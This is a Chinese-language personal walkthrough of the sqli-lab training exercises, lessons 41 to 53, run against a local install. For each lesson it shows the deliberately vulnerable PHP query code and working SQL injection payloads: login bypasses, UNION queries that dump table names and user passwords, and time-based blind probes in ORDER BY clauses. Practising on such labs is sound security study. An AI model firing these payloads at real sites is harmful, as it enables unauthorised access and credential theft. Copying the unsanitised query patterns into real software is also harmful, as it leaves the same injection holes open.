SQLI-LAB 的 实战记录(Less 41 - Less 53)
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 41 stacked Query Intiger type blind
(第41节:层次化查询 数字型 盲注 )
Test:
http://localhost/sqli-lab/Less-41/index.php?id=1'
注:有问题但不显示报错信息
Sourse Code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
if($row = mysqli_fetch_row($result)){
printf("Your Username is : %s", $row[1]);
printf("Your Password is : %s", $row[2]);
}
}
if (mysqli_more_results($con1)) {
}
}
Solution:
http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23
其它:
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 42 Stacked Query error based
(第42节:层次化查询 基于错误)
Test:
http://localhost/sqli-lab/Less-42/index.php
login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11''' at line 1 注:password周围是单引号
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
/* store first result set */
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
}
}else{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}else{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
其它:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 43 stacked Query String type
(第43节:层次化查询 字符类型)
Test:
http://localhost/sqli-lab/Less-43/index.php
login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'')' at line 1 注:password周围是单引号
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
}
}else{
print_r(mysqli_error($con1));
}
}else{
print_r(mysqli_error($con1));
}
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
其它:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 44 Stacked Query blind
(第44节:层次化查询 盲注)
Test:
http://localhost/sqli-lab/Less-44/index.php
login_user=admin&login_password=0'&mysubmit=login
注:没有显示报错信息
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
}
}
}
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login
其它:
login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 45 Stacked Query Blind based twist
(第45节:层次化查询 基于盲注 变形 )
Test:
http://localhost/sqli-lab/Less-45/index.php
login_user=admin&login_password=0'&mysubmit=login
注:没有显示报错信息
Sourse Code:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
if($result = @mysqli_store_result($con1)){
if($row = @mysqli_fetch_row($result)){
if ($row[1]){
return $row[1];
}else{
return 0;
}
}
}
}
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login
其它:
login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login
login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 46 ORDER BY-Error-Numeric
(第46节:GET - 基于错误 - 数字型 - ORDER BY 从句)
Test:
http://localhost/sqli-lab/Less-46/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 注:数字型
http://localhost/sqli-lab/Less-46/index.php?sort=1+asc
http://localhost/sqli-lab/Less-46/index.php?sort=1+desc
注: 可以通过asc 和desc查看返回数据是否相同来简单判断是否存在orderby注入
Sourse Code:
$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result){
while ($row = mysql_fetch_assoc($result)){
echo $row['id'];
echo $row['username'];
echo $row['password'];
}
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)
其它:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 47 ORDER BY Clause-Error-Single quote
(第47节:ORDER BY 从句 - 基于错误-单引号 )
Test:
http://localhost/sqli-lab/Less-47/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 注:sort周围是单引号
Sourse Code:
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
while ($row = mysql_fetch_assoc($result)){
echo $row['id'];
echo $row['username'];
echo $row['password'];
}
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
其它:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 48 ORDER BY Clause Blind based
(第48节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-48/index.php?sort=1'
http://localhost/sqli-lab/Less-48/index.php?sort=1"
http://localhost/sqli-lab/Less-48/index.php?sort=1')
http://localhost/sqli-lab/Less-48/index.php?sort=1")
注:均没有显示报错信息
Sourse Code:
$sql = "SELECT * FROM users ORDER BY $id";
$result = mysql_query($sql);
if ($result){
while ($row = mysql_fetch_assoc($result)){
echo $row['id'];
echo $row['username'];
echo $row['password'];
}
}
Solution:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)
其它:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 49 ORDER BY Clause Blind based
(第49节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-49/index.php?sort=1'
注:没有显示报错信息
http://localhost/sqli-lab/Less-49/index.php?sort=1"
注:正常,再结合上一条,sort周围是单引号
Sourse Code:
$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
while ($row = mysql_fetch_assoc($result)){
echo $row['username'];
echo $row['password'];
}
}
Solution:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
其它:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 50 ORDER BY Clause Blind based
(第50节:ORDER BY 从句 基于盲注)
Test:
http://localhost/sqli-lab/Less-50/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 注:数字型
Sourse Code:
$sql="SELECT * FROM users ORDER BY $id";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
while($row = mysqli_fetch_row($result)){
printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);
}
}
}else{
print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)
其它:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 51 ORDER BY Clause Blind based
(第51节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-51/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 注:sort周围是单引号
Sourse Code:
$sql="SELECT * FROM users ORDER BY '$id'";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
while($row = mysqli_fetch_row($result)){
printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);
}
}
}else{
print_r(mysqli_error($con1));
}
Solution:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
其它:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 52 ORDER BY Clause Blind based
(第52节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-52/index.php?sort=1'
http://localhost/sqli-lab/Less-52/index.php?sort=1"
http://localhost/sqli-lab/Less-52/index.php?sort=1')
http://localhost/sqli-lab/Less-52/index.php?sort=1")
注:均没有显示报错信息
Sourse Code:
$sql="SELECT * FROM users ORDER BY $id";
if (mysqli_multi_query($con1, $sql)){
if ($result = mysqli_store_result($con1)){
while($row = mysqli_fetch_row($result)){
printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);
}
}
}
Solution:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)
其它:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)
http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 53 ORDER BY Clause Blind based
(第53节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-53/index.php?sort=1'
注:没有显示报错信息
http://localhost/sqli-lab/Less-53/index.php?sort=1"
注:正常,再结合上一条,sort周围是单引号
Sourse Code:
$sql="SELECT * FROM users ORDER BY '$id'";
if (mysqli_multi_query($con1, $sql)) {
if ($result = mysqli_store_result($con1)){
while($row = mysqli_fetch_row($result)){
printf("%s", $row[0]);
printf("%s", $row[1]);
printf("%s", $row[2]);
}
}
}
Solution:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1
其它:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1
http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1